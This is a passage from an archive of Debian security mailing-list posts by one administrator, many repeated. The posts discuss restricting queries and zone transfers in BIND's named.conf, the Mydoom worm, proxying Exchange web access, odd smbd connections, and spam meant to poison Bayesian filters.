names, I get all the inverse lookups denied.
I now suspect at least some of the 1 or so queries
I've blocked in the last couple hours are valid, but it
is hard to tell amidst the buzzing of the spammers on
the screen door...
I note that another person suggested this is the wrong
technique to use. Would that person say it was better
to do something like:
options {
allow-queries {
mydomain;
};
zone
allow-queries {
all;
};
???
I have to be careful with experimentation because this
is not a toy machine. Not exceedingly busy, but still
a real server doing real serving.
A slightly different problem, which I just started
looking into deeper, is that I have
zone .
allow-transfer {
dnsip1;
dnsip2;
myworkstation;
};
where the object is to allow my workstation to
do host -a -l ... but it doesn't work. Says I
am not a primary or secondary. This is not quite
what I would expect since anyone can transfer if
there is no allow-transfer statement at all.
--
------
Dale Amon [EMAIL PROTECTED]+44-7802-188325
International linux systems consultancy
Hardware & software system design, security
and networking, systems programming and Admin
"Have Laptop, Will Travel"
--
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Hardening named.conf
I've finally been annoyed enough by spammer hits on my DNS that I've pulled out the BOG for the first time in several years. What I'd like to accomplish is the following: * allow-query for a specific list of addresses to use the server for their dns resolution. * allow-query to the universe for zones (domains and subdomains) that are hosted as primary or secondary on the server but drop all other requests. * I already limit zone xfr's to specific machines. I'm not clear on how to do the first and second without them interfering with each other although I'm sure it can be done. I am leaning towards an options allow-query with a an access list and adding allow-query to each zone to allow-query all if I can figure out how to do that. If some kind soul knows off the top of their head, it would save me the better part of an evening and perhaps wee hours of the morning. -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" --
Hardening named.conf
I've finally been annoyed enough by spammer hits on my DNS that I've pulled out the BOG for the first time in several years. What I'd like to accomplish is the following: * allow-query for a specific list of addresses to use the server for their dns resolution. * allow-query to the universe for zones (domains and subdomains) that are hosted as primary or secondary on the server but drop all other requests. * I already limit zone xfr's to specific machines. I'm not clear on how to do the first and second without them interfering with each other although I'm sure it can be done. I am leaning towards an options allow-query with a an access list and adding allow-query to each zone to allow-query all if I can figure out how to do that. If some kind soul knows off the top of their head, it would save me the better part of an evening and perhaps wee hours of the morning. -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: W32/Mydoom@MM (was: Re: )
On Tue, Jan 27, 2004 at 09:50:24AM -0700, s. keeling wrote: > Pardon me if this seems a bit thick headed, but why should I care? The > Windows world is always being attacked by crap like this. Why is this > news? > > I don't use Windows. Since you're using Evolution, I assume you > aren't either. So what's the big deal? > > Of course if you're using Debian as a mailserver for an internal > Windows network, this may affect you, but what's it got to do with > Debian? Many use Debian boxes as corporate servers. Some people here will have to worry about security of their company LAN which contains Windows boxes picking up their mail from that Linux server. So yes, for some people it *does* matter. -- ------ Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" --
Re: W32/Mydoom@MM (was: Re: )
On Tue, Jan 27, 2004 at 09:50:24AM -0700, s. keeling wrote: > Pardon me if this seems a bit thick headed, but why should I care? The > Windows world is always being attacked by crap like this. Why is this > news? > > I don't use Windows. Since you're using Evolution, I assume you > aren't either. So what's the big deal? > > Of course if you're using Debian as a mailserver for an internal > Windows network, this may affect you, but what's it got to do with > Debian? Many use Debian boxes as corporate servers. Some people here will have to worry about security of their company LAN which contains Windows boxes picking up their mail from that Linux server. So yes, for some people it *does* matter. -- ------ Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Need recomendations for https proxy that serves as a firewall proxy
On Wed, Dec 31, 2003 at 03:05:43PM +0100, Richard Atterer wrote: > On Wed, Dec 31, 2003 at 11:33:02AM +0200, Haim Ashkenazi wrote: > > I have a client that have an exchange server inside the LAN and he wants to > > access the web interface from the world. I thought I'll put a transparent > > proxy server on the DMZ. apt-cache search proxy gave a few options but > > except squid (which is a little overkill for this) I don't know any of them > > (especially in terms of security) and I'm looking for recommendations. > > Um, do I understand correctly that you want to allow access from the > internet to a machine in your client's LAN? In that case, squid is indeed > the wrong solution. I think they may be talking about MS Exchange Server. The program I like to think of as "The Internet's Answer to the Petrie Dish*" I do not think I would use the words "Exchange Server" and "Security" in the same breath. On the serious side, you probably could allow a port redirect to that machine if there are no other web services to be accessed. In general though, this is a pretty bad idea, and with MS Inside, even worse. * for the non biologically inclined, that's what you use for culturing bacteria... -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" --
Re: Need recomendations for https proxy that serves as a firewall proxy
On Wed, Dec 31, 2003 at 03:05:43PM +0100, Richard Atterer wrote: > On Wed, Dec 31, 2003 at 11:33:02AM +0200, Haim Ashkenazi wrote: > > I have a client that have an exchange server inside the LAN and he wants to > > access the web interface from the world. I thought I'll put a transparent > > proxy server on the DMZ. apt-cache search proxy gave a few options but > > except squid (which is a little overkill for this) I don't know any of them > > (especially in terms of security) and I'm looking for recommendations. > > Um, do I understand correctly that you want to allow access from the > internet to a machine in your client's LAN? In that case, squid is indeed > the wrong solution. I think they may be talking about MS Exchange Server. The program I like to think of as "The Internet's Answer to the Petrie Dish*" I do not think I would use the words "Exchange Server" and "Security" in the same breath. On the serious side, you probably could allow a port redirect to that machine if there are no other web services to be accessed. In general though, this is a pretty bad idea, and with MS Inside, even worse. * for the non biologically inclined, that's what you use for culturing bacteria... -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: suspicious smbd connections
On Wed, Dec 24, 2003 at 03:33:54PM +0100, outsider wrote: > But I have a dynamic IP. Every time I boot my system I get another > IP-address. Besides what everyone else said... I've also seen it happen that someone pulls an address from dhcp that was perhaps minutes before being used by someone running a p2p server. Not relevant to your samba, but it can be so bad you reboot to get off the ip. -- ------ Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" --
Re: suspicious smbd connections
On Wed, Dec 24, 2003 at 03:33:54PM +0100, outsider wrote: > But I have a dynamic IP. Every time I boot my system I get another > IP-address. Besides what everyone else said... I've also seen it happen that someone pulls an address from dhcp that was perhaps minutes before being used by someone running a p2p server. Not relevant to your samba, but it can be so bad you reboot to get off the ip. -- ------ Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Attempts to poison bayesian systems
On Wed, Dec 24, 2003 at 04:08:14AM +, Nick Boyce wrote: > Merry Happy Season Of Jollyness everyone > Nick Boyce > Bristol, UK I'll second that: A Merry Christmas and a bug-free New Year to all! Dale Amon Belfast, UK and/or Ireland ;-^ -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" --
Re: Attempts to poison bayesian systems
On Wed, Dec 24, 2003 at 04:08:14AM +, Nick Boyce wrote: > Merry Happy Season Of Jollyness everyone > Nick Boyce > Bristol, UK I'll second that: A Merry Christmas and a bug-free New Year to all! Dale Amon Belfast, UK and/or Ireland ;-^ -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Attempts to poison bayesian systems
On Tue, Dec 23, 2003 at 01:32:23PM +, Kalle Kivimaa wrote: > I have yet to see a false positive caused by this even though I get > quite a lot of this stuff and routinely mark it as spam. I can't think of any other reason for someone to do it though. There has to be a point. Someone is going to a lot of trouble. -- ------ Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" --
Attempts to poison bayesian systems
I've been noticing loads of mails like this lately: Date: Sun, 21 Dec 2003 16:25:34 +0500 From: "Joseph Jenkins" <[EMAIL PROTECTED]> Subject: Re: MIT, rest in peace! To: [EMAIL PROTECTED] X-Mailer: mPOP Web-Mail 2.19 emery atrocious larval drippy elate incontrollable raster anglicanism checkerberry feed sit ajar saturable decathlon already climate inhibition pagoda narcissus expository toni I can only assume someone out there is trying to attack bayesian systems by loading them up with all sorts of normal words so that good mail gets false positives, thus breaking the systems. I presume others are seeing this? -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" --
Re: Attempts to poison bayesian systems
On Tue, Dec 23, 2003 at 01:32:23PM +, Kalle Kivimaa wrote: > I have yet to see a false positive caused by this even though I get > quite a lot of this stuff and routinely mark it as spam. I can't think of any other reason for someone to do it though. There has to be a point. Someone is going to a lot of trouble. -- ------ Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
